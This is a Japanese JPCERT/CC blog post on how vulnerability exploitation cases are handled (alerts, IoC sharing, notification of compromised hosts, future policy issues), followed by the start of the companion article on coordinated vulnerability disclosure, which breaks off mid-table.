Eyes：注意喚起や情報共有活動における受信者側の「コスト」の問題についてー情報発信がアリバイや成果目的の自己目的化した行為にならないためにー https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html 脆弱性を悪用した攻撃で使われたマルウェアや通信先等、侵害を見つけるためのインディケータ情報は、注意喚起時に公表されるケースもあれば、非公開の情報共有活動で展開されるケースもあり、伝達手段や組み合わせ、タイミングはさまざまです。後述の海外製品のケースのように利用者数が多すぎるために注意喚起とともにインディケータ情報も公開されるケースもあれば、メーカーや専門機関からユーザーに対して個別に非公開で連絡を取って伝達されるケースなどもあります。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881478 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF-640wri.png" alt="" width="640" height="351"></a> <figcaption>図1：脆弱性悪用情報ハンドリングの各判断要素／各組織のアクション</figcaption> </figure> <h4> </h4> <h4>脆弱性悪用のさまざまなパターンの解説</h4> <hr> 脆弱性の悪用事案について、ごく簡単に整理すると以下のようにパターン分けができます。例えば、国内製品のゼロデイでグローバルに影響するようなケースはほとんど発生していませんので、本稿では解説は省略し、JPCERT/CCがよく対応している、以下、ケースA（国内製品のゼロデイ事案）、B（海外製品のゼロデイ事案）、C（海外製品のNデイ事案）について解説します。 <table style="border-collapse: collapse; width: 100%; height: 179.2px;" border="1"><colgroup><col style="width: 25.022%;"><col style="width: 21.6857%;"><col style="width: 28.3582%;"><col style="width: 24.9342%;"></colgroup> <tbody> <tr> <td>国内製品か海外製品か</td> <td>ゼロデイ攻撃かNデイ攻撃か</td> <td>影響範囲は国内か、主に国外か、（国内含む）グローバルか</td> <td> </td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="4">国内製品</td> <td style="height: 22.4px;" rowspan="2">ゼロデイ</td> <td style="height: 22.4px;">影響は基本的に国内</td> <td style="height: 22.4px;">ケースAで解説</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td style="height: 22.4px;">（※ほとんどケースがない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="2">Nデイ</td> <td style="height: 22.4px;">影響は基本的に国内</td> <td>紙幅の都合から本稿では解説せず</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td>（※ほとんどケースがない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="4">海外製品</td> <td style="height: 22.4px;" rowspan="2">ゼロデイ</td> <td style="height: 22.4px;">国内の影響はほとんどない</td> <td style="height: 22.4px;">－ （※注意喚起等の情報発信は行っていない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td style="height: 22.4px;">ケースBで解説</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;" rowspan="2">Nデイ</td> <td style="height: 22.4px;">国内の影響はほとんどない</td> <td style="height: 22.4px;">－ （※注意喚起等の情報発信は行っていない）</td> </tr> <tr style="height: 22.4px;"> <td style="height: 22.4px;">グローバルに影響</td> <td style="height: 22.4px;">ケースCで解説</td> </tr> </tbody> </table> <h5>＜ケースA：国内製品のゼロデイ事案＞</h5> 国内製品の場合、発見者や被害組織、または製品開発者からの連絡・相談を受けて、脆弱性の特定と製品開発者での修正プログラム準備、公表に向けた調整が行われます。本稿前編で解説のとおり、国内においては「情報セキュリティ早期警戒パートナーシップ」に基づき、調整機関として指定されたJPCERT/CCが製品開発者との調整を行います。国内で悪用被害がすでに発生している場合はインシデント対応支援や情報共有活動とセットで調整が行われ、被害現場からの情報をもとに原因（悪用された脆弱性）の特定が行われます。被害組織、調査を行う組織、JPCERT/CC、製品開発者と複数の関係者が連携して脆弱性公表や悪用に関する注意喚起に向けた調整が行われます。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881658 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C-640wri.png" alt="" width="640" height="431"></a> <figcaption>図2：国内製品悪用時の対応</figcaption> </figure> 〇被害現場側調査とメーカー側調査との間の仲介・調整・検証 本稿前編にて、脆弱性発見者と製品開発者との間の知見の非対称性によるミスコミュニケーションの問題について触れましたが、悪用事案対応においても同様の問題はあります。例えば、悪用被害現場側が調査結果から指摘する脆弱性の存在の可能性とその修正方法について、製品開発者側が攻撃に関する知見や情報が不足しているため正確に理解できず、修正プログラムが不十分なものとなってしまうケースがあります。また、被害現場側は調査に係るNDAや行政機関側への報告等、情報の取り扱いに制限がかけられていることが多いため、製品開発者側に十分な情報が提供されず、脆弱性の特定・検証や修正が不十分に終わる恐れがあります。 逆に、悪用被害現場側の調査者が当該製品について知見や情報が不足しており、脆弱性やその発生箇所について誤認（あるいは不足）してしまっているケースもあります。そうした際には調整機関であり、かつ、インシデント対応組織であるJPCERT/CCが仲介を行い、適切な脆弱性修正への調整を行っています。 また、当該時点までに認知・調査できている被害現場が限定的であったり、攻撃者が痕跡を消去、または痕跡が極めて残りにくい脆弱性／攻撃であったりする場合、当該脆弱性情報以外のインディケータ情報を情報共有活動に展開・照会を行い、同一アクターによる他の被害現場を見つけ出し、不足するアーティファクト／情報を補う必要がある場合もあります。 さらには、同一アクターが複数の脆弱性（※同一製品の複数の脆弱性を組み合わせている場合や、複数の製品の脆弱性を同一攻撃キャンペーン内で悪用している可能性も否定できない）を悪用していないか確認する必要もあり、攻撃キャンペーンへの対処という観点では、被害現場―メーカー間の調査結果を相互に連携させる必要があるのです。 調整機関としてのJPCERT/CCの役割は、単に「連絡役」ではなく、こうした情報の出し入れや検証がスムーズに行えるよう「調整役」「検証役」でもあるのです。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881660 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d-640wri.png" alt="" width="640" height="360"></a> <figcaption>図3：発見者―調整機関―製品開発者間で行われる脆弱性悪用に関する検証（のための各判断要素）</figcaption> </figure> 〇他のゼロデイ攻撃被害組織の発見と支援 脆弱性調整と別にインシデント対応支援／情報共有活動としてインディケータ情報の展開などを行い、まだ被害を認知できていない被害組織の特定を行います。攻撃キャンペーンがなおも継続中で緊急を要する場合、修正プログラム等の準備ができ次第、速やかに脆弱性公表や注意喚起を行い、その際にIoC情報や侵害調査方法を開示し、このフェーズの代わりとすることもあります。 また、法人向け製品の場合、製品開発者側から利用顧客にコンタクト／サポートできるケースがあるため、脆弱性公表前に影響のある顧客等への事前連絡を行う場合が多くあります。主に海外製品の先行例が多いですが、製品のテレメトリー通信やリモートサポート等によって製品開発者側から侵害疑義のある顧客を特定・通知できる場合もあり、脆弱性公表や注意喚起前に事前に実施するケースもあります。 こうした、情報共有、注意喚起、被害組織への個別通知、製品開発者からの連絡、とさまざまな伝達経路を組み合わせ、被害の早期発見や被害拡大防止に取り組みます。これらの手段の組み合わせは、攻撃活動の状況（攻撃キャンペーン中なのか事後なのか）、修正プログラム準備の進捗状況、影響範囲（被害範囲）などに応じて、その組み合わせ方、順番、タイミング等はケースバイケースで判断されます。特定のガイドラインやマニュアルがあるのではなく、攻撃キャンペーンへの対処という観点から柔軟に調整を行っています。 <h5>＜ケースB：海外製品のゼロデイ事案、ケースC：海外製品のNデイ事案＞</h5> 海外製品の脆弱性悪用被害が日本以外で先行して発覚した場合、特に影響がグローバルに波及するような脆弱性の場合、すべてのケースではありませんが、当該国内で対応した専門機関やセキュリティベンダー、メーカーから事前に各国への情報共有が行われ、脆弱性公表と同時に各国において注意喚起が行われるよう、事前調整が行われます。 ケースとしてほとんどありませんが、海外製品の脆弱性悪用被害が日本国内で先行して発覚した場合、発見者から海外メーカーに直接連絡がなされるか、JPCERT/CCを経由した連絡、またはJPCERT/CCを同報した上で海外メーカーに連絡がなされます。 〇脅威動向の変化への対応 従前は、「過去に悪用（ゼロデイ攻撃）されており、脆弱性公表時点では攻撃キャンペーンはすでに終了しているが、他のアクターによる悪用の蓋然性が高いため注意喚起を行う」という対応が行われていました。 他方で、ここ数年で増えてきているケースとして、「（X）注意喚起を行っても攻撃キャンペーンが継続しているもの」「（Y）脆弱性公表からすぐにNデイ攻撃が行われるもの」があります。（図4下段） （X）のパターンについては、正確には、 （X-1）早期に悪用が発覚し、攻撃キャンペーン中に脆弱性公表・注意喚起を行えたケース （X-2）ゼロデイ攻撃が発覚・脆弱性が公表されても攻撃活動が継続されるケース の2種類があります。 前者については、いわゆるIAB的アクター<a href="#fn2">[2]</a>によって広範囲な攻撃が行われることから、その早期発覚の可能性も高まっている背景があると推測されます。後者についてもIAB的アクターによる悪用ケースがほとんどですが、例えば2024年1月の「Ivanti Connect SecureおよびIvanti Policy Secureの脆弱性（CVE-2023-46805およびCVE-2024-21887）」<a href="#fn3">[3]</a>のケースでは、UNC5221が先行するゼロデイ攻撃（2023年12月）に加えて、脆弱性公表＋注意喚起直後も攻撃活動を継続していたことが確認<a href="#fn4">[4]</a>されています。 こうしたIAB的アクターがゼロデイ攻撃／Nデイ攻撃を行うケースでは、ネットワークアプライアンス／エッジデバイスへのWebshell設置等が戦術として好まれることから、侵害されたホストを外形上特定することが可能なケースが多くあります。そのため、攻撃発覚後に多くのセキュリティベンダー／研究者等によりスキャン調査が行われ、「侵害済みホストに関する情報」が国際機関間等で共有されることになります。 JPCERT/CCが調査するケースもありますが、こうした海外提供情報を活用し、すでに侵害されたホストの管理・利用組織への通知オペレーションを注意喚起や情報共有と並行して実施します。 やや余談になりますが、こうしたスキャン情報はレポートやSNSを通じて公開情報として流通することがありますが、実際には脆弱性影響バージョンかどうかの調査が不正確な情報発信もあり、こうした情報の精査も行っています。 <figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881661 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3-800wri.png" alt="" width="800" height="559"></a> <figcaption>図4：（主に海外製品の）脆弱性悪用発生時の対応のタイムライン</figcaption> </figure> 〇通知オペレーションの実施（特にケースCの場合） 前述のような、すでに侵害されたことが外形上判明しているホスト管理組織への個別通知のほかに、脆弱性公表／注意喚起後も脆弱なままの状態になっているホスト管理組織への通知オペレーションも実施する場合があります。 特に、ExploitやPoCが公表され、広く不特定多数のアクターが悪用可能な状態であったり、前述のような、IAB的アクターが継続して攻撃キャンペーンを展開する可能性があったりするケースにおいて、未被害・脆弱なホスト管理組織への通知オペレーションを実施しています。 あらゆるケースで脆弱なままのホスト管理組織への通知を行っているわけではありません。基本的に脆弱性対応については、一義的には製品開発者等からユーザーへの伝達と脆弱性修正対応がなされるべきであって、ユーザー（あるいはその委託等を受けた組織）自身での機器管理・脆弱性情報把握が行われるべきと考えているからです。 他方でこれまでもブログ記事で触れてきた通り、市場／商流上の脆弱性情報流通には課題<a href="#fn5">[5]</a>があるところ、上記のような攻撃の蓋然性が高まっている、あるいはすでに攻撃キャンペ―ン中であるという状況においては、通知オペレーションを行わざるを得ない、というのが実情です。 <h4> </h4> <h4>今後の課題</h4> <hr> ここまで、脆弱性悪用に対する現行のJPCERT/CCでのオペレーションを紹介しましたが、さまざまな課題もあるところ、今後、脆弱性対応制度や能力の改善に向けた動きが出てくる可能性があります。 昨年11月に公表された、サイバー安全保障分野での対応能力の向上に向けた有識者会議による「サイバー安全保障分野で対応能力の向上に向けた提言」（以下、「提言」という。）<a href="#fn6">[6]</a>では、脆弱性対応や注意喚起等の情報発信についていくつか言及がなされています。有識者会議で取り上げられた提言を中心に、現状のオペレーション上の課題と今後の論点について簡単に考察してみます。 <h5> ＜緊急性の高い情報発信に関するワンボイス化について＞</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>（省略）現在、内閣サイバーセキュリティセンター（NISC）のほか、警察・経済産業省・JPCERT/CC・情報処理推進機構等が個別に情報発信を行っているが、特に緊急性の高い情報発信について機関ごとに差異が生じないよう、ワンボイスで行われるべきである。（提言3ページ）</td> </tr> </tbody> </table> 現行では（JPCERT/CCからの情報も活用いただきつつも）各機関が独自の情報発信を行っており、同じ脆弱性について注意喚起を出す／出さない判断が分かれる場合も散見されます。発信内容の「温度感」や技術的内容に差異があるような、個別バラバラな情報発信は改善しなくてはなりませんが、他方で、「ワンボイス化」の論点としては以下の点を挙げることができます。 〇スピード感の問題 前述のとおり、影響範囲の大きい、特に海外製品の脆弱性の悪用ケースについては、公表後1日以内での注意喚起発行を行っています<a href="#fn7">[7]</a>。例えば注意喚起の検討段階で複数機関間の検討プロセスを設けた場合、スピードが落ちる可能性や、立場上の意見が異なった場合にある程度妥協した内容が発信情報として採用されてしまう恐れがあります。 〇複数機関が発信・対応することのメリット 何かしらすり合わせをした情報発信が行われる必要がある一方、発信組織を必ずしも一つにする必要はありません。「ワンボイス」は必ずしも対応組織を一本化することと同義ではありません。例えば行政学の分野では、複数機関による冗長性があることで過誤の発生を抑制し、また、環境変化への適応性が高まる点が指摘<a href="#fn8">[8]</a>されています。また、現行の体制においても、各機関からの発信情報や支援が届くリーチ範囲はそれぞれ異なっており、重複による受信者負担等を解消しなければならない課題があるものの、冗長性の観点で捉えると重層的な対処体制と解釈することもできます。 <h5>＜悪用に関する情報の取り扱いについて＞</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>毎年多くの脆弱性が公表されるなか、利用者が膨大な脆弱性情報の中から優先的に対応すべきものを特定できるよう、政府は、米国政府が公表している「既知の悪用された脆弱性カタログ」を参考に、国内で悪用されている脆弱性情報を一元的に分かりやすく発信すべきである。（提言3ページ）</td> </tr> </tbody> </table> 〇温度感が不明瞭な点 現行のKEVでは、ランサムアクターによる悪用有無が示されるものの、当該悪用がいつの時点の事象なのか、現時点で攻撃キャンペーンが継続中なのか、また、今後の悪用の蓋然性があるのかどうかなどが示されていません。また、悪用のエビデンスとして、セキュリティベンダーの分析レポートも紐付いていません。 〇国内制度における取り組みの周知不足 情報セキュリティ早期警戒パートナーシップにおいて、2023年度の「情報システム等の脆弱性情報の取扱いに関する研究会」による検討結果を踏まえて、悪用を示す情報の取り扱いに関する規定が新たに定められ、関連する告示改訂も行われています<a href="#fn9">[9]</a>。すでに2024年度から運用が始まっており、JVNに掲載された国内製品については、その悪用有無に関する情報が掲載されるケースが徐々に増えてきています。有識者検討会では本制度運用について言及がありませんでしたが、まずは本制度運用の周知強化の課題に取り組む必要があると考えます。 <h5>＜スキャン、通知オペレーションについて＞</h5> <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td>外部からのスキャンによって脆弱性を把握し、注意喚起をすることも効果的と考えられるが、精度が低い場合には、注意喚起の対象となった組織の過度な負担になってしまうことにも留意すべきである。（提言4ページ）</td> </tr> </tbody> </table> 注意喚起を巡る受信組織側のコスト負担については、先に紹介した以前のブログ記事<a href="#fn10">[10]</a>にて解説のとおりですが、通知オペレーションについても同様の課題があります。通知はJPCERT/CCだけが行っているものではなく、また、組織だけでなく個人も含めて国内外で多くの「通知」が行われています。よく見られる問題として、侵害されていると判断した根拠（技術的証拠）が不明瞭なケースや、侵害の調査方法や調査に必要な情報（タイムスタンプなど）が示されない／サポートされない“一方通行”的な通知ケースがあります。 特に、悪用されている攻撃キャンペーンを観測・対応した組織ではない組織／個人が侵害調査方法を知り得てスキャン調査と通知をするケースでは、通知対象組織への提供情報が限定的であったりサポートが不十分であったりするケースが見受けられます。また、こうした発見者／調査者の情報を単に仲介するだけの組織による通知活動においても同様の問題が散見されます。 ※数多く行っているJPCERT/CCからの通知オペレーションにおいても、諸事情により調査に必要な技術的情報を完全に提供しきれていないと反省するケースが残念ながらあります。ご意見・クレーム等あればいつでもお寄せいただければと思います。 <h5>＜情報発信だけ行われる問題点について＞</h5> 有識者提言では触れられませんでしたが、情報発信「後」の取り組みについても課題があります。本稿前半で解説のとおり、JPCERT/CCから注意喚起や情報共有、通知オペレーションを行った場合、侵害有無調査に必要な情報提供のほか、侵害疑義が見つかった組織からのインシデント相談にも対応しています。本稿でも取り上げたようにここ数年で増加しているネットワークアプライアンス／エッジデバイス関連の脆弱性悪用事案では、当該侵害機器のフォレンジック調査に課題があります。IAB的アクターは国際的に広範囲の機器に対して攻撃を行う一方、製品の多くでは運用保守ベンダーでは詳細な調査ができないためメーカーへの調査依頼が殺到し、速やかに回答を得られないケースが散見されています。また、こうした攻撃では機器の侵害後に横展開されるかどうか調査が不足しているケースも多く見受けられるため、注意喚起を出して終わりではなく、その後の調査までサポートが必要になります。 現状では、情報発信をするすべての機関があらゆる製品に対してこうした調査まで行う能力・リソースを有しているわけではないため、国全体としての対応にバラつきが出てしまっている次第です。 <h5>＜公表前の脆弱性情報／悪用情報の取り扱いについて＞</h5> こちらも有識者提言では触れられなかったポイントです。現行の国内制度上は、公表前の脆弱性の詳細に関する情報はごく限られた関係者（IPA、JPCERT/CC、メーカー、発見者）間で取り扱いがなされます。例外はあり、2017年からは政府と一部の重要インフラ事業者に対して公表前の優先的な情報提供（「優先情報提供」）<a href="#fn11">[11]</a>が整備されています。 こうした「優先的な（公表前の）情報提供」については日本のような制度的なものではないものの、例えば海外においてはMicrosoft社がベンダー等に公表前の脆弱性情報提供行うMAPP（Microsoft Active Protections Program）<a href="#fn12">[12]</a>があります。 他方で、こうした公表前の事前情報提供については公表前の情報漏えい疑義のトラブルも発生<a href="#fn13">[13]</a>しています。現行の国内制度では、優先的な情報提供先は現時点で限られていることや、詳細な情報については調整フェーズ（基本的に発見者―JPCERT/CC―メーカー間のやり取り）内で扱われていることから、罰則規定のない取り扱い制度とはいえ、万が一不適切な扱いがあった場合に原因となった組織等を比較的特定しやすい体制にはなっています。他方で、2023年度の「情報システム等の脆弱性情報の取扱いに関する研究会」でJPCERT/CCから意見<a href="#fn14">[14]</a>を表明していますが、優先情報提供を拡充することへのメーカー側からの懸念が出ており、今後、公表前の脆弱性情報の扱いについてプレーヤー等が増えるのであれば、情報漏えい対策の議論がさらに必要になります。 <h4> </h4> <h4>さいごに</h4> <hr> 日本は世界的にも珍しく、公的な制度の元で官民連携による脆弱性情報のハンドリングが行われてきました。海外においては、基本的に発見者―メーカー間の直接／個別の調整が行われてきた結果、意図しない情報開示などのトラブルが度々起きてきました。他方で、JPCERT/CCが日々国際連携している中で見えている範囲では、海外において、脆弱性の悪用に関する情報の流通度は日に日に高まってきているように見えます。悪用情報に触れるプレーヤーがこれまでのさまざまな脆弱性情報ハンドリングの失敗を経験しながらも、徐々に相場観を形成し、自発的に足並みを揃え始めているのではないかと考えています。 日本においては脆弱性告示制度のもとで、特に公表前の脆弱性悪用に関する情報を流通させるプレーヤーがある意味限定されてきた経緯があるわけですが、一方で、今後は脆弱性悪用情報に触れる／発信するプレーヤーが増えていくことが想定されます。 今年5月にいわゆるサイバー対処能力強化法と同整備法が成立しましたが、強化法第42条では脆弱性のある製品のベンダー等に対して、「サイバー攻撃による被害を防止するために必要な措置を講ずるよう要請する」ことや、改正されたサイバーセキュリティ基本法第7条において、責務規定（利用者のサイバーセキュリティ確保のための設計・開発、情報の継続的な提供等に努める旨）が追加<a href="#fn15">[15]</a>されました。今後、行政機関やベンダーの役割が拡大されていく中で、脆弱性の公表だけでなく、悪用情報がどのように扱われ、ユーザーが調査のために必要な技術的情報がどのようなタイミングでどのような手段によって提供されるべきか、今後の議論にJPCERT/CCのこれまでの知見を積極的にインプットしていきたいと考えています。 <h4> </h4> <h4>参考文献等</h4> <a name="fn1"></a>[1]経済産業省「脆弱性関連情報取扱体制」https://www.meti.go.jp/policy/netsecurity/vulinfo.html <a name="fn2"></a>[2]IABというと、いわゆるクライム系アクターの一分類として扱われてきましたが、近年、APTキャンペーンにおいて分業制が採られるケースが増えており、APTキャンペーンにおける”IAB”的アクターを定義する動きもあります。Cisco Talos,"Redefining IABs: Impacts of compartmentalization on threat tracking and modeling", https://blog.talosintelligence.com/redefining-initial-access-brokers/ <a name="fn3"></a>[3]2024/1/11 JPCERT/CC 「Ivanti Connect SecureおよびIvanti Policy Secureの脆弱性（CVE-2023-46805およびCVE-2024-21887）に関する注意喚起」https://www.jpcert.or.jp/at/2024/at240002.html <a name="fn4"></a>[4]2024/4/5 Google/Mandiant, “Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies”, https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en <a name="fn5"></a>[5]JPCERT/CC Eyes 「なぜ、SSL-VPN製品の脆弱性は放置されるのか～“サプライチェーン”攻撃という言葉の陰で見過ごされている攻撃原因について～」https://blogs.jpcert.or.jp/ja/2022/07/ssl-vpn.html <a name="fn6"></a>[6]https://www.cas.go.jp/jp/seisaku/cyber_anzen_hosyo/koujou_teigen/teigen.pdf <a name="fn7"></a>[7]海外機関―ベンダー間の調整前後で、公表前に情報共有がなされるケースもあります。 <a name="fn8"></a>[8]鈴木潔「新型コロナウィルス感染防止対策における行政組織間の連携―冗長性・他機関連携・リーダーシップ―」（年報行政研究57「行政における冗長性」収録） <a name="fn9"></a>[9]https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html <a name="fn10"></a>[10]JPCERT/CC Eyes：注意喚起や情報共有活動における受信者側の「コスト」の問題について－情報発信がアリバイや成果目的の自己目的化した行為にならないために― https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html <a name="fn11"></a>[11]優先情報提供については、早期警戒パートナーシップガイドラインをご参照ください。 https://www.ipa.go.jp/security/guide/vuln/ug65p90000019by0-att/partnership_guideline.pdf また、過去の検討経緯はIPAのHPで公開されている、過去の「情報システム等の脆弱性情報の取扱いに関する研究会」報告書でご覧いただけます。https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html <a name="fn12"></a>[12]https://www.microsoft.com/en-us/msrc/mapp <a name="fn13"></a>[13]2025年7月にゼロデイ攻撃が発覚・公表となった、Microsoft Sharepointの脆弱性（CVE-2025-53770等）について、MAPP経由で事前に情報が漏えいした可能性が指摘されていることについてブルームバーグ紙が報じました。現時点で本件の結論等はまだ不明ですが、同様の指摘は2021年のMicrosoft Exchange Serverの脆弱性（いわゆるProxyshell）についてもWSJ紙が報じた経緯があります。 <a name="fn14"></a>[14]「情報システム等の脆弱性情報の取扱いに関する研究会」2023年度報告書33ページ　https://www.ipa.go.jp/security/reports/vuln/nq6ept000000ldxx-att/report2023.pdf <a name="fn15"></a>[15]https://www.cyber.go.jp/pdf/council/cs/dai43/43shiryou4.pdf
解説：脆弱性関連情報取扱制度の運用と今後の課題について（前編）～公益性のある脆弱性情報開示とは何か～

Fri, 12 Sep 2025 04:30:00 -0000

※脆弱性関連情報取扱制度は経済産業省およびIPAとともに運用していますが、本稿は...

※脆弱性関連情報取扱制度は経済産業省およびIPAとともに運用していますが、本稿はJPCERT/CCとして執筆したものです。 日本では、「情報セキュリティ早期警戒パートナーシップ」<a href="#fn1">[1]</a><a href="#fn2">[2]</a>に基づく運用を20年以上行ってきた実績があり、各国に先んじて、いわゆる「協調された脆弱性開示（CVD）」への取り組みが官民連携で行われてきました。しかし、残念ながら、制度運用への理解が十分に広まっていないことを示すような出来事が度々発生しています。単に法律やガイドラインに書いてあることを解釈するだけでなく、「なぜこの仕組みは存在するのか／必要とされているのか」を考察しなければ、制度（や制度の維持）という「手段」が自己目的化し、形骸化、あるいは硬直化し実態にそぐわなくなる恐れがあります。  多くの発見者、製品開発者が脆弱性調整に関わるようになったとはいえ、社会／業界全体からすると、多くの組織／人にその対応経験が十分にあるわけではありません。インシデント対応と同様に、公表される内容、経緯は一部であり、その調整過程や詳細は限られた関係者にしか知られない世界です。本稿では、制度上の「調整機関」として、また、悪用時のインシデント対応支援を行うJPCERT/CCの観点から、対応現場側の課題と今後について考察してみたいと考えています。「前編」では、まだ悪用の蓋然性がない、“平時”の脆弱性調整について解説し、後編では脆弱性が悪用される蓋然性が高まっている、あるいはすでに悪用された場合の各種オペレーションについてご紹介したいと思います。 なお、脆弱性関連情報の取扱いを巡る法的な観点でのさまざまな論点の整理については、高橋郁夫弁護士らによる「情報システム等の脆弱性情報の取扱いにおける法律面の調査報告書改訂版」<a href="#fn3">[3]</a>がIPAのWebサイトで公開されていますので、まずはこちらをご参照ください。 <h4> </h4> <h4>平時の対応について</h4> 前述のとおり、日本では「情報セキュリティ早期警戒パートナーシップ」制度に基づき、各国に先んじて、いわゆる「協調された脆弱性開示（CVD）」への取り組みが官民連携で行われてきました。 海外においては、基本的に発見者―メーカー間で直接／個別の調整が行われてきた結果、意図しない情報開示などのトラブルが度々起きてきました。「メーカーが脆弱性であると認めないから情報開示する」「公益性が高いと判断し公表する」といった主張にて、両者の協調に依らない情報開示が度々行われてきました。あるいは、発見者が脆弱性について指摘していたにも関わらずメーカー側から誠実な対応が得られなかったというトラブルも度々起きてきました。他方で、最近では国としてCVDを推進したり、メーカーとして対応方針を宣言する組織も増え、また、脆弱性情報に触れるプレーヤーがこれまでのさまざまな脆弱性情報ハンドリングの失敗を経験しながらも徐々に相場観を形成し、自発的に足並みを揃えつつある状況です。 脆弱性情報というものは、メーカーにとってはネガティブな情報であり、一方で発見者にとってはその活動成果や能力を示すポジティブな情報です。ユーザーにとっては、問題が解消されるポジティブな情報ですが、コントロールされない情報開示が悪用につながればネガティブな情報となります。そうした中で、日本の脆弱性情報の取り扱い制度においては、調整後のメーカーからの公表を基本とし、また、公表時（JVN掲載）には発見者を明記することができるようになっています。JVNという場を使い、メーカーとしての情報開示、発見者としての情報開示がスムーズに連動できるようになっているのです。 以前のブログ記事<a href="#fn4">[4]</a>でも解説したとおり、こうした仕組みは、情報を効率よく活用し、どこか一個人／一組織だけのために“消費”され、他者の不利益が発生するような、負の外部性を可能な限り避けるための仕組みと言えます。 <h4> </h4> <h4>調整制度はなぜ存在するのか</h4> 脆弱性を悪用する攻撃者と悪用された製品のメーカーとの関係は「加害者」と「被害者」の関係になりますが、他方で、脆弱性の発見者とメーカーとの関係はそうではありません。こうした、「加害者」「被害者」だけの図式で捉えられない利害の衝突へのアプローチとして、経済学や法学の分野では「コースの定理」という考え方が用いられることがあります。当事者間の私的な取り引きを通じて「最も効率的な結果が達成される」という定理を、コースの定理といいます。 <table style="border-collapse: collapse; width: 100%;" border="1"><colgroup><col style="width: 99.9123%;"></colgroup> <tbody> <tr> <td> 